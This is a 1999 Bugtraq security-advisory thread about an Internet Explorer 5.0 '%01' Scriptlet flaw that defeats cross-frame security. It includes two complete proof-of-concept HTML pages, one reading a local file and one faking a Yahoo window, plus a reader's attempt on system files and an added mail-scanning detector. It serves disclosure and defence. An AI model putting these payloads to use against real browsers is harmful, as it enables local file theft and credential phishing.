Date: Fri, 9 Apr 1999 07:15:12 +0300
From: Georgi Guninski <joro@NAT.BG>
To: BUGTRAQ@netspace.org
Subject: IE 5.0 security vulnerabilities - %01 bug again

There is a security bug in Internet Explorer 5.0 which circumvents "Cross-frame security" and opens several security holes.
This is a modification of the "%01 security bug" (that was fixed in IE 5.0) I found in January.

The problem seems to be in the "Microsoft Scriptlet Component". If you add '%01someURL' after the URL you pass to "Microsoft Scriptlet Component", IE thinks that the document is loaded from the domain of 'someURL'.

Some of the vulnerabilities are:

1) IE allows reading local files and sending them to an arbitrary server.
The filename must be known.

The bug may be exploited using HTML mail message.

Demo is available at: http://www.nat.bg/~joro/scriptlet.html

2) IE allows "window spoofing". After visiting a hostile page (or clicking a hostile link) a window is opened and its location is a trusted site. However, the content of the window is not that of the original site, but it is supplied by the owner of the page. So, the user is misled into believing he is browsing a trusted site, while he is browsing a hostile page and may provide sensitive information, such as credit card number.

The bug may be exploited using HTML mail message.

Demo is available at: http://www.nat.bg/~joro/scrspoof.html

Workaround: Disable Javascript

Regards,
Georgi Guninski

----------------------------------------------------------------------------------
[http://www.nat.bg/~joro/scriptlet.html]

<HTML>
<HEAD>
<TITLE>IE 5.0 "%01" security vulnerability - file reading</TITLE>
</HEAD>
<BODY>
There is a security bug in Internet Explorer 5.0 which circumvents "Cross-frame security" and opens several security holes.
<BR>
This is a modification of the "%01 security bug" (that was fixed in IE 5.0) I found in January.
<BR>
The problem seems to be in the "Microsoft Scriptlet Component".
If you add '%01someURL' after the URL you pass to "Microsoft Scriptlet Component", IE thinks that the document is loaded from the domain of 'someURL'.
This page demonstrates reading local files.
<BR>
Workaround: Disable Javascript
<BR>
<A HREF="http://www.nat.bg/~joro">Go to Georgi Guninski's home page</A>
<OBJECT classid="clsid:AE24FDAE-03C6-11D1-8B76-0080C744F389" >
<PARAM NAME="URL" value="about:<SCRIPT>alert('Create a short file C:\\test.txt and it will be read and shown in a message box');a=window.open('file://c:/test.txt');alert(a.document.body.innerText);a.close();</SCRIPT>%01file://c:/">
</OBJECT>
</BODY>
</HTML>

----------------------------------------------------------------------------------
[http://www.nat.bg/~joro/scrspoof.html]

<HTML>
<HEAD>
<TITLE>IE 5.0 "%01" security vulnerability - window spoofing</TITLE>
</HEAD>
<BODY>
There is a security bug in Internet Explorer 5.0 which circumvents "Cross-frame security" and opens several security holes.
<BR>
This is a modification of the "%01 security bug" (that was fixed in IE 5.0) I found in January.
<BR>
The problem seems to be in the "Microsoft Scriptlet Component".
If you add '%01someURL' after the URL you pass to "Microsoft Scriptlet Component", IE thinks that the document is loaded from the domain of 'someURL'.
This page demonstrates spoofing windows.
<BR>
Workaround: Disable Javascript
<BR>
<A HREF="http://www.nat.bg/~joro">Go to Georgi Guninski's home page</A>
<OBJECT classid="clsid:AE24FDAE-03C6-11D1-8B76-0080C744F389" >
<PARAM NAME="URL" value="about:<SCRIPT>a=window.open('http://www.yahoo.com/');a.document.write('<HTML><HEAD><TITLE>Yahoo</TITLE></HEAD><BODY><H1>Look at the address bar!<BR>');a.document.write('<A HREF=&quot;http://www.nat.bg/~joro&quot;>Go to Georgi Guninski home page</A></H1></BODY></HTML>');</SCRIPT>%01http://www.yahoo.com">
</OBJECT>
</BODY>
</HTML>

----------------------------------------------------------------------------------

Date: Fri, 9 Apr 1999 08:38:09 -0400
From: Eric Stevens <ejsteven@CS.MILLERSV.EDU>
To: BUGTRAQ@netspace.org
Subject: Re: IE 5.0 security vulnerabilities - %01 bug again

Is there any way to exploit this with files that are not recognized as text? Example, I tried modifying your code to c:\autoexec.bat and c:\winnt\win.ini. Instead of displaying the contents of my autoexec.bat file, I instead received an Open/Save As dialog. Open tries to execute the bat file or edit the ini file in the temp folder where it was downloaded, and save as does the obvious.

This problem exists on both versions of IE5 that I have access to, 5.00.0708.700 [ships with Windows 2000 Beta 2 build 5.00.1877], and 5.00.2014.0216 [a public release].

Hopefully this can't be exploited against anything but text files as it's not terribly likely that you have any sensitive information sitting around in text files whose names are likely to be guessed.

----] quote [----
>1) IE allows reading local files and sending them to an arbitrary
>server.
>The filename must be known.
>
>The bug may be exploited using HTML mail message.
>
----] end quote [----
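The check below is an added example, not code from Georgi Guninski's post or from Microsoft: a mail-gateway style scan that flags a Scriptlet OBJECT (the CLSID is the one in the demo pages) whose URL parameter carries a percent-encoded control character, and reports the origin IE 5.0 was tricked into adopting next to what a strict parser returns. The function names, the constructed sample mail body, and the decision to flag every C0 control rather than only %01 are my assumptions.

```javascript
// Added example (not from the original post). Flagging every percent-encoded C0 control,
// not just the %01 the post describes, is a generalisation I am assuming is sound.
const SCRIPTLET_CLSID = "AE24FDAE-03C6-11D1-8B76-0080C744F389"; // from the demo pages

// True if the URL carries a raw or percent-encoded C0 control character (0x00-0x1F, 0x7F).
function containsControl(url) {
  return /[\x00-\x1f\x7f]/.test(url) || /%(0[0-9a-f]|1[0-9a-f]|7f)/i.test(url);
}

// Scheme plus host (if any), lower-cased; parses only from the start of the string.
function parseOrigin(url) {
  const m = /^([a-z][a-z0-9+.-]*):(?:\/\/([^\/?#]*))?/i.exec(url);
  if (!m) return null;
  return (m[2] !== undefined ? `${m[1]}://${m[2]}` : `${m[1]}:`).toLowerCase();
}

// A URL with an embedded control character has no trustworthy origin at all.
function strictOrigin(url) {
  return containsControl(url) ? null : parseOrigin(url);
}

// The origin IE 5.0 was reported to adopt: whatever follows the last %01.
function trickedOrigin(url) {
  const parts = url.split(/%01/i);
  return parts.length > 1 ? parseOrigin(parts[parts.length - 1]) : null;
}

// Scan an HTML mail body for Scriptlet OBJECTs whose URL PARAM smuggles a control char.
function findScriptletAbuse(html) {
  const findings = [];
  const objRe = /<OBJECT\b[^>]*classid\s*=\s*["']?clsid:([0-9a-f-]+)["']?[^>]*>([\s\S]*?)<\/OBJECT>/gi;
  let m;
  while ((m = objRe.exec(html)) !== null) {
    if (m[1].toUpperCase() !== SCRIPTLET_CLSID) continue;
    const p = /<PARAM\b[^>]*NAME\s*=\s*["']?URL["']?[^>]*value\s*=\s*"([^"]*)"/i.exec(m[2]);
    if (!p || !containsControl(p[1])) continue;
    findings.push({ url: p[1], trickedOrigin: trickedOrigin(p[1]), strictOrigin: strictOrigin(p[1]) });
  }
  return findings;
}

// Constructed sample mail body, shaped like the first demo page but with a harmless script.
const SAMPLE_MAIL = [
  "<HTML><BODY>",
  "<OBJECT classid=\"clsid:AE24FDAE-03C6-11D1-8B76-0080C744F389\" >",
  "<PARAM NAME=\"URL\" value=\"about:<SCRIPT>alert(1)</SCRIPT>%01file://c:/\">",
  "</OBJECT></BODY></HTML>",
].join("\n");
console.log(JSON.stringify(findScriptletAbuse(SAMPLE_MAIL), null, 2));
```

A gateway would reject or quarantine any message that produces a finding; the trickedOrigin field is only there to show the reviewer which domain the component would have been fooled into trusting.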